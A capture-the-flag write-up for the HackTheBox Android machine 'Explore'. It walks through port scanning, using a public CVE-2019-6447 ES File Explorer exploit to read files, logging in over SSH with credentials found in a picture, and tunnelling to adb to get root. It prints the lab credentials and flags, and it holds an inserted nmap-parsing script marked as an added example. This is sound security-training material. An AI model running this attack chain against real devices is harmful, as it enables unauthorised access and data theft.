HTB: Explore

Posted on 01 Nov 2021 in security • 3 min read

Explore card

This is a writeup about a retired HackTheBox machine, Explore, created by bertolis and published on June 26, 2021. The box is rated easy. The user part relies on an ES File Explorer vulnerability that exposes an arbitrary file read over the network; the root part is a simple SSH port forward to the device's adb service followed by an adb shell.

User

Recon

We start with a full-port nmap scan. As the output below shows, SSH is on the non-standard port 2222, port 5555 is filtered, and a few HTTP services answer on high ports (42135 and 59777 among them).

# Nmap 7.91 scan initiated Sat Jul 10 02:07:06 2021 as: nmap -sSV -A -p- -oN notes.md 10.129.153.142
Nmap scan report for 10.129.153.142
Host is up (0.012s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
33427/tcp open     unknown
<SNIP>
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
<SNIP>

The nmap scan hints that the "box" is actually an Android device: port 5555 (adb) is filtered, the SSH banner comes from Banana Studio (an Android SSH server app), and ES File Explorer is answering on an HTTP port.
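The inference above (adb port, Banana Studio banner, ES File Explorer service) is the kind of triage worth automating when scan output piles up. The following is an added example, not code from the original writeup: a small parser for nmap's normal (-oN) output that attaches script lines to the port they belong to and flags the Android indicators used here. The sample scan text embedded below is constructed to mirror the format of the scan above; the indicator names and the parse_nmap_normal/android_findings functions are this example's own.

```python
"""Triage nmap -oN output for the Android fingerprints used in the writeup.

Added example (not part of the original post). The SAMPLE_SCAN text is
constructed to match nmap's normal output format; the function and
indicator names are assumptions of this example.
"""
import re
from dataclasses import dataclass, field

# "2222/tcp  open     ssh     (protocol 2.0)" -> port, proto, state, service, version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    script_lines: list = field(default_factory=list)


def parse_nmap_normal(text):
    """Parse nmap -oN output into PortRecord objects.

    NSE script lines ("| ..." and "|_ ...") are attached to the port that
    precedes them, so banners such as the SSH identification string can be
    inspected next to the SERVICE/VERSION columns.
    """
    records = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(int(port), proto, state, service, version))
        elif line.startswith("|") and records:
            # strip the "|", "|_" prefix and indentation from script output
            records[-1].script_lines.append(line.lstrip("|_ ").strip())
    return records


# Indicators that an Android device (possibly running ES File Explorer) answered.
ANDROID_INDICATORS = [
    ("adb_port", lambda r: r.port == 5555 and r.proto == "tcp"),
    ("banana_ssh", lambda r: r.service == "ssh"
     and any("Banana Studio" in s for s in r.script_lines)),
    ("es_file_explorer", lambda r: "ES File Explorer" in r.version),
    # 59777/tcp is the ES File Explorer HTTP listener described by
    # CVE-2019-6447; nmap's service guess for it is often wrong, so match
    # on the port as well as on the version string.
    ("es_http_59777", lambda r: r.port == 59777 and r.service == "http"),
]


def android_findings(records):
    """Return {indicator_name: [ports]} for every indicator that matched."""
    findings = {}
    for name, test in ANDROID_INDICATORS:
        ports = [r.port for r in records if test(r)]
        if ports:
            findings[name] = ports
    return findings


# Constructed sample in nmap -oN format (illustrative ports and banners).
SAMPLE_SCAN = """\
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
"""

if __name__ == "__main__":
    for name, ports in android_findings(parse_nmap_normal(SAMPLE_SCAN)).items():
        print(f"{name}: {ports}")
```

The port-based rule for 59777 is deliberate: as the scan above shows, nmap labelled that listener as a Minecraft JSONAPI, so a version-string match alone would have missed it.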

A quick Google search for "ES File Explorer exploit" turns up an arbitrary file read exploit (the open port vulnerability tracked as CVE-2019-6447, as the script's banner below shows).

We run it and can list the files on the Android phone, but nothing there gives us a shell (we are still able to read the user flag). Listing the pictures, we find a creds.jpg file.

└─$ python3 50070.py listPics 10.129.153.142

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

The file is a picture of (beautifully) handwritten credentials: kristi:Kr1sT!5h@Rp3xPl0r3!

We can use these credentials to connect over SSH (port 2222) and get the user flag.

└─$ ssh kristi@10.129.153.142 -p2222 #Kr1sT!5h@Rp3xPl0r3!
Password authentication
Password:
Password authentication
Password:
Password authentication
Password:
kristi@10.129.153.142's password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
:/ $ cat /sdcard/user.txt
f32017174c7c7e8f50c6da52891ae250

Root

We saw in our initial port scan that port 5555 (adb) was filtered. Since we have SSH access to the device, we reach the port from the device itself by creating an SSH local forward tunnel (local port 5557 to 127.0.0.1:5555 on the phone).

└─$ ssh -L 5557:127.0.0.1:5555 kristi@10.129.43.55 -p2222
Password authentication
Password:
:/ $ id
uid=10076(u0_a76)

In another terminal we run adb to list the attached device, connect to it, get a shell, switch to root with su and grab the flag.

└─$ adb devices
List of devices attached
127.0.0.1:5557  device
└─$ adb connect 127.0.0.1:5557
already connected to 127.0.0.1:5557
└─$ adb -s 127.0.0.1:5557 shell
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
:/ # find / -name 'root.txt' 2> /dev/null
/data/root.txt
1|:/ # cat data/root.txt
f04fc82b6d49b41c9b08982be59338c5

Wrapping up

A "quick" and easy box. I spent way too much time on the root part as my adb daemon was acting weirdly and I thought the issue was on my port forwarding.